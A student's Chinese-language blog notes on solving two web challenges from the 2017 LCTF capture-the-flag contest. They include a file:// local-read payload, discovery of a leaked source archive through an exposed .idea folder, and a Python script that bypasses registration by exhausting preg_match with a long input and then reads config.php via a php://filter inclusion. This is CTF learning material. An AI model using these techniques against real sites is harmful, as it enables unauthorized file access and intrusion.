2017 LCTF 学习体会
1. web签到题:
用file协议可以读取本地文件
要绕过逻辑中对host的检查,需要用到curl命令,curl支持file://host/path, file://path 这两种形式,都会访问到本地文件
截断url后面拼接的/, GET请求,用?#都可以
Payload:
file://www.baidu.com/etc/flag?
LCTF{1eTus_q14ndao_B4_387t439hg9342}
之前自己做的时候想到本地代理一般都是设置为127.0.0.1:8080, 试过之后发现不行,查询之后发现它只是本机的一个回送地址,不进行网络传输
2. 萌萌哒的报名系统:
这题提示给了IDE,从大佬的wp中知道PHP有款强大的IDE叫做PHPSTORM,它新建项目时会产生一个.idea文件夹,payload: http://123.206.120.239/.idea/ 访问文件夹
发现有一个xdcms2333.zip, payload: http://123.206.120.239/xdcms2333.zip? 下载这个压缩包,打开得到整站源码:
查看了login.php和member.php 没有发现什么有用的东西,看register.php 时, 有以下两处关键代码:
$admin = "xdsec"."###".str_shuffle('you_are_the_member_of_xdsec_here_is_your_flag');
preg_match('/^(xdsec)((?:###|\w)+)$/i', $code, $matches);
如果匹配了$matches[0]=$admin,就可以把xdsec注册到identities表中去,这样我们就可以绕过member.php中的:
$sth->execute([':username' => $_SESSION['username']]);
if ($sth->fetch()[0] === 'GUEST') {
$_SESSION['is_guest'] = true;
}
但是str_shuffle是不可预测的。所以要另找方法,很多人用的非预期解—条件竞争,如果在identities表中没有username这一行数据,那么取出来$sth->fetch[0]的结果就为null,可绕过第一层,所以可以用Python多线程注册用户,(没试过)。
其实正解是通过pre_match函数的资源消耗来绕过,喂给pre_match一个很长的字符串,会导致pre_match消耗大量资源从而导致后面的php不会执行。
脚本如下:
# !/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
import threading
import re
import os
__author__ = "hahahha"
s = requests.session()
url = 'http://123.206.120.239/'
url1 = url+'register.php'
url2 = url+'login.php'
url3 = url+'member.php?file=php://filter/resource=config.php'
headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0'}
def register():
data = {
'username':'Asdfgh',
'password':'123456',
'code':'xdsec###'+'A'*1000000
}
try:
res1=s.post(url1,headers=headers,data=data,timeout=10)
print (res1.text)
except:
pass
def login():
data = {
'username':'Asdfgh',
'password':'123456'
}
res2=s.post(url2,headers=headers,data=data)
print (res2.text)
def member():
res3 = s.get(url3,headers=headers)
print (res3.text)
if __name__=='__main__':
register()
login()
member()
脚本是看别人的,在这里也总结一下,一般的应该怎么写:
Requests是Python的第三方库,需要自己下载安装才能使用,这次用到的是web提交的基本使用,requsets.session()是一个会话,requests.session().post(url,headers,data,timeout), 其中headers只把User-Agent 添加进去就行了,不过要添加完整,我做的时候就复制少了,所以一直出不来,print(res.txet)打印的内容要规范一点,最好别用(res.content)。
经过这道题,我觉得我要学的东西还很多,PHP代码审计,正则表达式是很重要的,等Python的老师讲有点等不及了,先自己看看吧,再实践实践,Python也用得不是很熟。加油吧,少年!
注:自己实在是太菜,复现都只能做出两道题来,唉唉唉!最近刚半期考完,数电成绩很不理想,英语六级也快要考了,花在这方面的时间可能会要少一点。
网友评论